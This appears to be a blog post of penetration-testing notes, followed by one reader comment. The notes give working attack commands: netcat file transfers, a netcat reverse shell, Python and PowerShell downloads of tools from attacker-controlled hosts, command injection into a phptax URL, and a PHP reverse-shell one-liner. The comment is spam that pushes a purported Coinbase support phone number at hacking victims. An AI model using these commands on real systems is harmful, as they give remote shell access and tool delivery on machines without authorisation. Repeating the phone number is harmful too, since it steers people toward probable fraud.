Seems odd that the sender machine would be listening. whereby listening would imply waiting and not sending..
In Linux
##Sender Machine nc -v -w 40 -p 443 -l < file.php
Linux
###Receiver Machine
nc -v -w 10 192.168.0.100 443 > file.php
Sending from Linux to Windows
We first setup a Listener and tell netcat that any incoming file should be directed to a file name of our choice, regardless to what the file is.
Linux
##Sender Machine
nc -nv 10.0.0.22 4444 < /usr/bin/wget.exe
Windows
##Receiver Machine nc -nlvp 40 > incomingfile.exe
-----------------------------------------------------------------------------------------------------------
Sender
Windows
nc.exe -w 3 1.1.1.1 6667 < file
Receiver
Linux
nc -lvp 6667 > file
---------------------------------------------------------------------------------------------------------
Sending a Reverse Shell - This is when the sebding machine gives control of their system to the receiver.
###SenderMachine
nc -nv 10.0.0.22 443 -e /bin/bash
###Receiver Machine
nc -nlvp 443
Using Python like Wget - test it first
python.exe -c "import sys; print(sys.version_info)"
Sender
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"
Receiver
python -m SimpleHTTPServer 4445
Side Note:
If you cant create reverse or bind shells the try to create a file.
Using this logic we ca try to make a file with the php information of the system (phpinfo)
Something similar to this:
http://192.168.198.138:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php phpinfo() ?>" > a.php;&pdf=make
If we can make files then we can try a simple php shell - remember to escape the "$"
echo "\$sock=fsockopen('192.168.0.100',4444);exec('/bin/sh -i <&3 >&3 2>&3');" > shell4.php
---------------------------------------------------------------------------------
Using Powershell
Attacker
Setup a http listener (pythom -m SimpleHTTPServer 8989
Victim
(new-object System.Net.WebClient).DownloadFile('http://10.11.0.48:8989/windows-privesc-check2.exe',’C:\Windows\Temp\windows-privesc-check2.exe')
-------------------------------------------------------------------------------
Ftp files using Python (useful for windows)
Login with user - anonymous
Pass - anonymous
Hacker
python -m pyftpdlib -w -p 21
Victim
ftp IP
anonymous
anonymous
------------------------------------------------------------------------------
Powershell
IEX(New-Object Net.WebClient).downloadFile('http://whatever.com/file.exe', 'file.exe')
OR
IWR -Uri http://whatever.com/file.exe -OutFile file.exe
In this technology-era world, where hacking is a workday activity its very difficult to deal with scenarios when you Coinbase account has been hacked. It’s a serious issue and should be handled by someone who has knowledge and experience in deal wing with such issues on a regular basis. We mean, all you need to do is call on Coinbase support number 1877-330-7540 which is serviceable and users can call on this number from any part of the world and grab best of the solutions from the experienced team.
ReplyDelete